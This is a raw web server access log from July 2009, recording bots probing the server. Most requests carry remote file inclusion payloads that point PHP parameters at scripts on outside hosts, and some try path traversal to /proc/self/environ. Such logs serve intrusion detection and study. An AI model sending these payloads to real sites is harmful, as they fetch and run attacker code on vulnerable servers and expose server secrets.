123.143.98.5 - - [20/Jul/2009:02:51:00 -0400] "GET /logs/access_log.Q109060300%20%20//components/com_performs/performs.php?mosConfig_absolute_path=http://www.seokrim.ms.kr//data/shirohige/zfxid.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
123.143.98.5 - - [20/Jul/2009:02:51:12 -0400] "GET /logs/access_log.Q109070700%20%20//components/com_performs/performs.php?mosConfig_absolute_path=http://www.seokrim.ms.kr//data/shirohige/zfxid.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
123.143.98.5 - - [20/Jul/2009:02:51:14 -0400] "GET /logs/access_log.Q109060300%20%20//components/com_performs/performs.php?mosConfig_absolute_path=http://www.seokrim.ms.kr//data/shirohige/zfxid.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
123.143.98.5 - - [20/Jul/2009:02:51:15 -0400] "GET /logs/access_log.Q109051200////?_SERVER[DOCUMENT_ROOT]=http://aboutav.com//id1.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
118.45.190.166 - - [20/Jul/2009:02:51:18 -0400] "GET /logs/access_log.Q109070200%20%20//include/bbs.lib.inc.php?site_path=http://hongfuqitian.com/m1.gif??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
123.143.98.5 - - [20/Jul/2009:02:51:21 -0400] "GET /logs/access_log.Q109051200////?_SERVER[DOCUMENT_ROOT]=http://www.aboutav.com//Scripts/id1.txt???? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
118.45.190.166 - - [20/Jul/2009:02:51:24 -0400] "GET /logs/access_log.Q109070200//include/bbs.lib.inc.php?site_path=http://hongfuqitian.com/m1.gif??? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
125.248.150.52 - - [20/Jul/2009:02:51:28 -0400] "GET //components/com_performs/performs.php?mosConfig_absolute_path=http://www.seokrim.ms.kr//data/shirohige/zfxid.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
125.248.150.52 - - [20/Jul/2009:02:51:28 -0400] "GET /logs//components/com_performs/performs.php?mosConfig_absolute_path=http://www.seokrim.ms.kr//data/shirohige/zfxid.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
125.248.150.52 - - [20/Jul/2009:02:51:28 -0400] "GET /logs/access_log.Q109070700%20%20//components/com_performs/performs.php?mosConfig_absolute_path=http://www.seokrim.ms.kr//data/shirohige/zfxid.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
125.248.150.52 - - [20/Jul/2009:02:51:33 -0400] "GET /logs/access_log.Q109060300%20%20//components/com_performs/performs.php?mosConfig_absolute_path=http://www.seokrim.ms.kr//data/shirohige/zfxid.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
201.232.54.48 - - [20/Jul/2009:02:51:34 -0400] "GET /logs/access_log.Q109070500%20%20/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://aboutav.com//id1.txt??? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
201.232.54.48 - - [20/Jul/2009:02:51:47 -0400] "GET /logs/access_log.Q109070500/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://aboutav.com//id1.txt??? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
98.116.62.213 - - [20/Jul/2009:02:52:13 -0400] "GET /logs/access_log.Q109062000////?_SERVER[DOCUMENT_ROOT]=http://www.aboutav.com//Scripts/id1.txt???? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
123.143.98.5 - - [20/Jul/2009:02:52:24 -0400] "GET /logs/access_log.Q109070700%20%20//components/com_performs/performs.php?mosConfig_absolute_path=http://www.seokrim.ms.kr//data/shirohige/zfxid.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
123.143.98.5 - - [20/Jul/2009:02:52:25 -0400] "GET /logs/access_log.Q109060300%20%20//components/com_performs/performs.php?mosConfig_absolute_path=http://www.seokrim.ms.kr//data/shirohige/zfxid.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
125.248.150.52 - - [20/Jul/2009:02:53:24 -0400] "GET //components/com_performs/performs.php?mosConfig_absolute_path=http://www.seokrim.ms.kr//data/shirohige/zfxid.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
125.248.150.52 - - [20/Jul/2009:02:53:24 -0400] "GET /logs//components/com_performs/performs.php?mosConfig_absolute_path=http://www.seokrim.ms.kr//data/shirohige/zfxid.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
125.248.150.52 - - [20/Jul/2009:02:53:24 -0400] "GET /logs/access_log.Q109070700%20%20//components/com_performs/performs.php?mosConfig_absolute_path=http://www.seokrim.ms.kr//data/shirohige/zfxid.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
125.248.150.52 - - [20/Jul/2009:02:53:24 -0400] "GET /logs/access_log.Q109070700%20%20//components/com_performs/performs.php?mosConfig_absolute_path=http://www.seokrim.ms.kr//data/shirohige/zfxid.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
125.248.150.52 - - [20/Jul/2009:02:53:24 -0400] "GET /logs//components/com_performs/performs.php?mosConfig_absolute_path=http://www.seokrim.ms.kr//data/shirohige/zfxid.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
125.248.150.52 - - [20/Jul/2009:02:53:24 -0400] "GET //components/com_performs/performs.php?mosConfig_absolute_path=http://www.seokrim.ms.kr//data/shirohige/zfxid.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
125.248.150.52 - - [20/Jul/2009:02:53:30 -0400] "GET /logs/access_log.Q109060300%20%20//components/com_performs/performs.php?mosConfig_absolute_path=http://www.seokrim.ms.kr//data/shirohige/zfxid.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
125.248.150.52 - - [20/Jul/2009:02:53:36 -0400] "GET /logs/access_log.Q109060300%20%20//components/com_performs/performs.php?mosConfig_absolute_path=http://www.seokrim.ms.kr//data/shirohige/zfxid.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
110.45.145.92 - - [20/Jul/2009:02:53:47 -0400] "GET /logs/access_log.Q109062900%20//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://fotopasja.info/css/id.txt???? HTTP/1.1" 404 236 "-" "libwww-perl/5.79"
123.143.98.5 - - [20/Jul/2009:02:54:01 -0400] "GET /logs/access_log.Q109052100%20%20////?_SERVER[DOCUMENT_ROOT]=http://aboutav.com//id1.txt??? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
123.143.98.5 - - [20/Jul/2009:02:54:22 -0400] "GET /logs/access_log.Q109051200%20%20////?_SERVER[DOCUMENT_ROOT]=http://aboutav.com//id1.txt??? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
125.248.150.52 - - [20/Jul/2009:02:54:24 -0400] "GET /logs/access_log.Q109070700%20%20//components/com_performs/performs.php?mosConfig_absolute_path=http://www.seokrim.ms.kr//data/shirohige/zfxid.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
125.248.150.52 - - [20/Jul/2009:02:54:24 -0400] "GET /logs//components/com_performs/performs.php?mosConfig_absolute_path=http://www.seokrim.ms.kr//data/shirohige/zfxid.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
125.248.150.52 - - [20/Jul/2009:02:54:24 -0400] "GET //components/com_performs/performs.php?mosConfig_absolute_path=http://www.seokrim.ms.kr//data/shirohige/zfxid.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
125.248.150.52 - - [20/Jul/2009:02:54:28 -0400] "GET /logs/access_log.Q109060300%20%20//components/com_performs/performs.php?mosConfig_absolute_path=http://www.seokrim.ms.kr//data/shirohige/zfxid.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
123.143.98.5 - - [20/Jul/2009:02:54:45 -0400] "GET /logs/access_log.Q109052100%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.aboutav.com//Scripts/id1.txt???? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
123.143.98.5 - - [20/Jul/2009:02:54:46 -0400] "GET /logs/access_log.Q109051200%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.aboutav.com//Scripts/id1.txt???? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
125.248.150.52 - - [20/Jul/2009:02:54:51 -0400] "GET //components/com_performs/performs.php?mosConfig_absolute_path=http://www.seokrim.ms.kr//data/shirohige/zfxid.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
125.248.150.52 - - [20/Jul/2009:02:54:51 -0400] "GET /logs//components/com_performs/performs.php?mosConfig_absolute_path=http://www.seokrim.ms.kr//data/shirohige/zfxid.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
125.248.150.52 - - [20/Jul/2009:02:54:51 -0400] "GET /logs/access_log.Q109070700%20%20//components/com_performs/performs.php?mosConfig_absolute_path=http://www.seokrim.ms.kr//data/shirohige/zfxid.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
125.248.150.52 - - [20/Jul/2009:02:54:56 -0400] "GET /logs/access_log.Q109060300%20%20//components/com_performs/performs.php?mosConfig_absolute_path=http://www.seokrim.ms.kr//data/shirohige/zfxid.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
118.45.190.166 - - [20/Jul/2009:02:55:02 -0400] "GET /logs/access_log.Q109052800//include/bbs.lib.inc.php?site_path=http://hongfuqitian.com/m1.gif??? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
118.45.190.166 - - [20/Jul/2009:02:55:02 -0400] "GET /logs//include/bbs.lib.inc.php?site_path=http://hongfuqitian.com/m1.gif??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
118.45.190.166 - - [20/Jul/2009:02:55:02 -0400] "GET //include/bbs.lib.inc.php?site_path=http://hongfuqitian.com/m1.gif??? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
98.116.62.213 - - [20/Jul/2009:02:55:05 -0400] "GET /logs/access_log.Q109062000////?_SERVER[DOCUMENT_ROOT]=http://www.aboutav.com//Scripts/id1.txt???? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
216.107.223.38 - - [20/Jul/2009:02:55:07 -0400] "GET /logs///vwar/backup/errors.php?error=http://www.4ieg.com/sf/lib/debug/fatal1.txt???? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
216.107.223.38 - - [20/Jul/2009:02:55:07 -0400] "GET /logs/access_log.Q109052400%20%20///vwar/backup/errors.php?error=http://www.4ieg.com/sf/lib/debug/fatal1.txt???? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
216.107.223.38 - - [20/Jul/2009:02:55:07 -0400] "GET ///vwar/backup/errors.php?error=http://www.4ieg.com/sf/lib/debug/fatal1.txt???? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
77.221.130.31 - - [20/Jul/2009:02:55:15 -0400] "GET /logs/modules/agendax/addevent.inc.php?agendax_path=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 235 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)"
77.221.130.31 - - [20/Jul/2009:02:55:15 -0400] "GET /modules/agendax/addevent.inc.php?agendax_path=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 230 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)"
77.221.130.31 - - [20/Jul/2009:02:55:15 -0400] "GET /logs/access_log.Q109061800/modules/agendax/addevent.inc.php?agendax_path=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 257 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)"
77.221.130.31 - - [20/Jul/2009:02:55:15 -0400] "GET /logs/errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 213 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
77.221.130.31 - - [20/Jul/2009:02:55:15 -0400] "GET /errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 208 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
77.221.130.31 - - [20/Jul/2009:02:55:15 -0400] "GET /logs/access_log.Q109061800/errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 235 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
77.221.130.31 - - [20/Jul/2009:02:55:16 -0400] "GET /logs/modules/agendax/addevent.inc.php?agendax_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 235 "-" "XXXXXX"
77.221.130.31 - - [20/Jul/2009:02:55:16 -0400] "GET /modules/agendax/addevent.inc.php?agendax_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 230 "-" "XXXXXX"
77.221.130.31 - - [20/Jul/2009:02:55:16 -0400] "GET /logs/access_log.Q109061800/modules/agendax/addevent.inc.php?agendax_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 257 "-" "XXXXXX"
77.221.130.31 - - [20/Jul/2009:02:55:16 -0400] "GET /logs/modules/agendax/addevent.inc.php?agendax_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "XXXXXX"
77.221.130.31 - - [20/Jul/2009:02:55:16 -0400] "GET /modules/agendax/addevent.inc.php?agendax_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 230 "-" "XXXXXX"
77.221.130.31 - - [20/Jul/2009:02:55:16 -0400] "GET /logs/access_log.Q109061800/modules/agendax/addevent.inc.php?agendax_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 257 "-" "XXXXXX"
216.107.223.38 - - [20/Jul/2009:02:55:21 -0400] "GET /logs/access_log.Q109061700%20%20///vwar/backup/errors.php?error=http://www.4ieg.com/sf/lib/debug/fatal1.txt???? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
123.242.165.138 - - [20/Jul/2009:02:55:52 -0400] "GET /logs/access_log.Q109063000%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.ebstore.de/id1.txt?? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
209.59.12.99 - - [20/Jul/2009:02:55:57 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
123.242.165.138 - - [20/Jul/2009:02:56:00 -0400] "GET /logs/access_log.Q109062300%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.ebstore.de/id1.txt?? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
124.0.139.129 - - [20/Jul/2009:02:56:00 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.babycome.ne.jp/report///id1.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
124.0.139.129 - - [20/Jul/2009:02:56:00 -0400] "GET /logs/access_log.Q109052200///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.babycome.ne.jp/report///id1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
124.0.139.129 - - [20/Jul/2009:02:56:00 -0400] "GET /logs/access_log.Q109062700///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.babycome.ne.jp/report///id1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
124.0.139.129 - - [20/Jul/2009:02:56:00 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.babycome.ne.jp/report///id1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
124.0.139.129 - - [20/Jul/2009:02:56:03 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.babycome.ne.jp/report///id1.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
124.0.139.129 - - [20/Jul/2009:02:56:03 -0400] "GET /logs/access_log.Q109052200///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.babycome.ne.jp/report///id1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
124.0.139.129 - - [20/Jul/2009:02:56:03 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.babycome.ne.jp/report///id1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
124.0.139.129 - - [20/Jul/2009:02:56:03 -0400] "GET /logs/access_log.Q109062700///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.babycome.ne.jp/report///id1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
61.78.62.84 - - [20/Jul/2009:02:56:09 -0400] "GET //oneadmin/photogallery/include.php?path[docroot]=http://www.dracocafe.pl/sklep/components/com_sef/1.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
61.78.62.84 - - [20/Jul/2009:02:56:09 -0400] "GET /logs/access_log.Q109063000//oneadmin/photogallery/include.php?path[docroot]=http://www.dracocafe.pl/sklep/components/com_sef/1.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
61.78.62.84 - - [20/Jul/2009:02:56:09 -0400] "GET /logs//oneadmin/photogallery/include.php?path[docroot]=http://www.dracocafe.pl/sklep/components/com_sef/1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
61.78.62.84 - - [20/Jul/2009:02:56:11 -0400] "GET //oneadmin/photogallery/include.php?path[docroot]=http://www.dracocafe.pl/sklep/components/com_sef/1.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
61.78.62.84 - - [20/Jul/2009:02:56:11 -0400] "GET /logs/access_log.Q109063000%20%20//oneadmin/photogallery/include.php?path[docroot]=http://www.dracocafe.pl/sklep/components/com_sef/1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
61.78.62.84 - - [20/Jul/2009:02:56:11 -0400] "GET /logs//oneadmin/photogallery/include.php?path[docroot]=http://www.dracocafe.pl/sklep/components/com_sef/1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
77.221.130.31 - - [20/Jul/2009:02:57:41 -0400] "GET /logs/access_log.Q109061300/modules/agendax/addevent.inc.php?agendax_path=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 257 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
77.221.130.31 - - [20/Jul/2009:02:57:42 -0400] "GET /logs/access_log.Q109061300/errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 235 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)"
77.221.130.31 - - [20/Jul/2009:02:57:42 -0400] "GET /logs/access_log.Q109061300/modules/agendax/addevent.inc.php?agendax_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 257 "-" "XXXXXX"
77.221.130.31 - - [20/Jul/2009:02:57:42 -0400] "GET /logs/access_log.Q109061300/modules/agendax/addevent.inc.php?agendax_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 257 "-" "XXXXXX"
61.78.62.84 - - [20/Jul/2009:02:57:54 -0400] "GET /logs/access_log.Q109052000%20%20//oneadmin/photogallery/include.php?path[docroot]=http://www.dracocafe.pl/sklep/components/com_sef/1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
61.78.62.84 - - [20/Jul/2009:02:58:28 -0400] "GET //oneadmin/photogallery/include.php?path[docroot]=http://www.dracocafe.pl/sklep/components/com_sef/1.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
61.78.62.84 - - [20/Jul/2009:02:58:28 -0400] "GET /logs//oneadmin/photogallery/include.php?path[docroot]=http://www.dracocafe.pl/sklep/components/com_sef/1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
59.125.245.181 - - [20/Jul/2009:02:58:29 -0400] "GET /logs/access_log.Q109063000%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.ebstore.de/id1.txt?? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
61.78.62.84 - - [20/Jul/2009:02:58:29 -0400] "GET /logs/access_log.Q109063000//oneadmin/photogallery/include.php?path[docroot]=http://www.dracocafe.pl/sklep/components/com_sef/1.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
118.45.190.166 - - [20/Jul/2009:02:58:30 -0400] "GET /logs/access_log.Q109070200//include/bbs.lib.inc.php?site_path=http://hongfuqitian.com/m1.gif??? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
59.125.245.181 - - [20/Jul/2009:02:59:05 -0400] "GET /logs/access_log.Q109062300%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.ebstore.de/id1.txt?? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
69.10.63.163 - - [20/Jul/2009:02:59:15 -0400] "GET //index.php?DOCUMENT_ROOT=http://www.4ieg.com/sf/lib/debug/fatal1.txt???? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
69.10.63.163 - - [20/Jul/2009:02:59:15 -0400] "GET /logs//index.php?DOCUMENT_ROOT=http://www.4ieg.com/sf/lib/debug/fatal1.txt???? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
69.10.63.163 - - [20/Jul/2009:02:59:15 -0400] "GET /logs/access_log.Q109061700%20%20//index.php?DOCUMENT_ROOT=http://www.4ieg.com/sf/lib/debug/fatal1.txt???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
69.10.63.163 - - [20/Jul/2009:02:59:15 -0400] "GET /logs/access_log.Q109060400%20%20//index.php?DOCUMENT_ROOT=http://www.4ieg.com/sf/lib/debug/fatal1.txt???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
91.121.111.100 - - [20/Jul/2009:02:59:24 -0400] "GET /?REX[INCLUDE_PATH]=http://www.thebalvenie.com//files/v6-i.txt??? HTTP/1.1" 200 409 "-" "libwww-perl/5.805"
91.121.111.100 - - [20/Jul/2009:02:59:24 -0400] "GET /logs/access_log.Q109052600/?REX[INCLUDE_PATH]=http://www.thebalvenie.com//files/v6-i.txt??? HTTP/1.1" 404 225 "-" "libwww-perl/5.805"
91.121.111.100 - - [20/Jul/2009:02:59:24 -0400] "GET /logs/?REX[INCLUDE_PATH]=http://www.thebalvenie.com//files/v6-i.txt??? HTTP/1.1" 200 10262 "-" "libwww-perl/5.805"
91.121.111.100 - - [20/Jul/2009:02:59:30 -0400] "GET /logs/access_log.Q109053100/?REX[INCLUDE_PATH]=http://www.thebalvenie.com//files/v6-i.txt??? HTTP/1.1" 404 225 "-" "libwww-perl/5.805"
200.6.155.240 - - [20/Jul/2009:02:59:42 -0400] "GET /logs//index.php?DOCUMENT_ROOT=http://www.nsau.edu.ru//images/banners/lib/fatal1.txt???? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
200.6.155.240 - - [20/Jul/2009:02:59:42 -0400] "GET //index.php?DOCUMENT_ROOT=http://www.nsau.edu.ru//images/banners/lib/fatal1.txt???? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
200.6.155.240 - - [20/Jul/2009:02:59:42 -0400] "GET /logs/access_log.Q109061700//index.php?DOCUMENT_ROOT=http://www.nsau.edu.ru//images/banners/lib/fatal1.txt???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
200.6.155.240 - - [20/Jul/2009:02:59:43 -0400] "GET /logs/access_log.Q109060400//index.php?DOCUMENT_ROOT=http://www.nsau.edu.ru//images/banners/lib/fatal1.txt???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
124.0.139.129 - - [20/Jul/2009:03:00:06 -0400] "GET /logs/access_log.Q109052200%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.babycome.ne.jp/report///id1.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
124.0.139.129 - - [20/Jul/2009:03:00:06 -0400] "GET /logs/access_log.Q109062700%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.babycome.ne.jp/report///id1.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
80.67.28.35 - - [20/Jul/2009:03:00:09 -0400] "GET //redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://impeel.com/impeel/wizard/roxx_jpg.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.808"
81.177.9.32 - - [20/Jul/2009:03:00:11 -0400] "GET //redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://www.thebalvenie.com//files/id1.txt? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
81.177.9.32 - - [20/Jul/2009:03:00:11 -0400] "GET /logs//redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://www.thebalvenie.com//files/id1.txt? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
81.177.9.32 - - [20/Jul/2009:03:00:11 -0400] "GET /logs/access_log.Q109052600//redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://www.thebalvenie.com//files/id1.txt? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
81.177.9.32 - - [20/Jul/2009:03:00:23 -0400] "GET /logs/access_log.Q109053100//redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://www.thebalvenie.com//files/id1.txt? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
124.0.139.129 - - [20/Jul/2009:03:00:24 -0400] "GET /logs/access_log.Q109052200%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.babycome.ne.jp/report///id1.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
124.0.139.129 - - [20/Jul/2009:03:00:24 -0400] "GET /logs/access_log.Q109062700%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.babycome.ne.jp/report///id1.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
61.78.62.84 - - [20/Jul/2009:03:00:27 -0400] "GET /logs/access_log.Q109052000//oneadmin/photogallery/include.php?path[docroot]=http://www.dracocafe.pl/sklep/components/com_sef/1.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
80.67.28.35 - - [20/Jul/2009:03:00:42 -0400] "GET //pollphp/textfile//admin/common.inc.php?base_path=http://impeel.com/impeel/wizard/roxx_jpg.txt?? HTTP/1.1" 404 237 "-" "libwww-perl/5.808"
209.59.12.99 - - [20/Jul/2009:03:00:58 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
80.67.28.35 - - [20/Jul/2009:03:01:02 -0400] "GET /logs/access_log.Q109051800//pollphp/textfile//admin/common.inc.php?base_path=http://impeel.com/impeel/wizard/roxx_jpg.txt?? HTTP/1.1" 404 264 "-" "libwww-perl/5.808"
80.67.28.35 - - [20/Jul/2009:03:01:02 -0400] "GET //pollphp/textfile//admin/common.inc.php?base_path=http://impeel.com/impeel/wizard/roxx_jpg.txt?? HTTP/1.1" 404 237 "-" "libwww-perl/5.808"
80.67.28.35 - - [20/Jul/2009:03:01:02 -0400] "GET /logs//pollphp/textfile//admin/common.inc.php?base_path=http://impeel.com/impeel/wizard/roxx_jpg.txt?? HTTP/1.1" 404 242 "-" "libwww-perl/5.808"
59.125.245.181 - - [20/Jul/2009:03:01:03 -0400] "GET /logs/access_log.Q109051700%20%20/errors.php?error=http://www.ebstore.de/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
123.143.98.5 - - [20/Jul/2009:03:01:07 -0400] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.aboutav.com//Scripts/id1.txt???? HTTP/1.1" 200 454 "-" "Mozilla/5.0"
123.143.98.5 - - [20/Jul/2009:03:01:08 -0400] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.aboutav.com//Scripts/id1.txt???? HTTP/1.1" 200 10269 "-" "Mozilla/5.0"
123.143.98.5 - - [20/Jul/2009:03:01:08 -0400] "GET /logs/access_log.Q109070200////?_SERVER[DOCUMENT_ROOT]=http://www.aboutav.com//Scripts/id1.txt???? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
123.143.98.5 - - [20/Jul/2009:03:01:36 -0400] "GET /logs/access_log.Q109062000////?_SERVER[DOCUMENT_ROOT]=http://www.aboutav.com//Scripts/id1.txt???? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
80.67.28.35 - - [20/Jul/2009:03:01:37 -0400] "GET /logs/error_log.Q109051800//pollphp/textfile//admin/common.inc.php?base_path=http://impeel.com/impeel/wizard/roxx_jpg.txt?? HTTP/1.1" 404 263 "-" "libwww-perl/5.808"
59.125.245.181 - - [20/Jul/2009:03:02:00 -0400] "GET /logs/access_log.Q109063000%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.ebstore.de/id1.txt?? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
195.206.99.238 - - [20/Jul/2009:03:02:02 -0400] "GET /logs/access_log.Q109052600//redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://83.3.132.70/iGeoMap/www//tmp/r.jpg?? HTTP/1.1" 404 281 "-" "libwww-perl/5.76"
195.206.99.238 - - [20/Jul/2009:03:02:03 -0400] "GET //redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://83.3.132.70/iGeoMap/www//tmp/r.jpg?? HTTP/1.1" 404 254 "-" "libwww-perl/5.76"
